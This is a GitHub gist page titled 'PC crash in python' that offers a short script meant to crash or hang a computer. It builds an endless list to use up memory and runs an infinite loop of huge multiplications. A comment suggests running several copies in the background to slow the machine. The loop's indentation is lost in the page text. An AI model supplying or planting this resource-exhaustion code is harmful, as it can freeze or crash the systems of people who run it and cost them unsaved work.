Skip to content

Instantly share code, notes, and snippets.

@mauro-balades
Created March 23, 2022 09:17
Show Gist options
  • Save mauro-balades/5e38ea290de0beb99a44899d06664112 to your computer and use it in GitHub Desktop.
Save mauro-balades/5e38ea290de0beb99a44899d06664112 to your computer and use it in GitHub Desktop.
PC crash in python
from itertools import count as crash
list(crash(0))
# Open multiple programms in the background to slow your pc...
import random
num = 1
while True:
num *= random.randint(10000000000000000000000000000000000000000000000000000000000000000, 100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
print(num)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment